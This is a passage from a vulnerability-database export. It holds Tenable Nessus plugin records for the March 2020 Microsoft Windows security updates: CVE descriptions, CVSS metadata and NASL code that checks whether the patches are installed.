memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\");\n # https://support.microsoft.com/en-us/help/4540688/windows-7-update-kb4540688\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?210cd1ec\");\n # https://support.microsoft.com/en-us/help/4541500/windows-7-update-kb4541500\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a7405b8a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4541500 or Cumulative Update KB4540688.\n\nPlease Note: These updates are only available through Microsoft's Extended Support Updates program.\nThis operating system is otherwise unsupported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0883\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540688', '4541500');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540688, 4541500])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:28:15", "description": "The remote Windows host is missing security update 4540694 or cumulative update 4541510. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540694: Windows Server 2012 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0799", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0814", "CVE-2020-0819", "CVE-2020-0822", "CVE-2020-0824", "CVE-2020-0830", "CVE-2020-0832", "CVE-2020-0833", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4541510.NASL", "href": "https://www.tenable.com/plugins/nessus/134375", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134375);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0799\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0814\",\n \"CVE-2020-0819\",\n \"CVE-2020-0822\",\n \"CVE-2020-0824\",\n \"CVE-2020-0830\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\"\n );\n script_xref(name:\"MSKB\", value:\"4541510\");\n script_xref(name:\"MSKB\", value:\"4540694\");\n script_xref(name:\"MSFT\", value:\"MS20-4541510\");\n script_xref(name:\"MSFT\", value:\"MS20-4540694\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540694: Windows Server 2012 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540694\nor cumulative update 4541510. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\");\n # https://support.microsoft.com/en-us/help/4541510/windows-server-2012-update-kb4541510\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?438d05ee\");\n # https://support.microsoft.com/en-us/help/4540694/windows-server-2012-update-kb4540694\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?224a0292\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4540694 or Cumulative Update KB4541510.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0883\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540694', '4541510');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540694, 4541510])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:27:53", "description": "The remote Windows host is missing security update 4541505 or cumulative update 4541509. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege 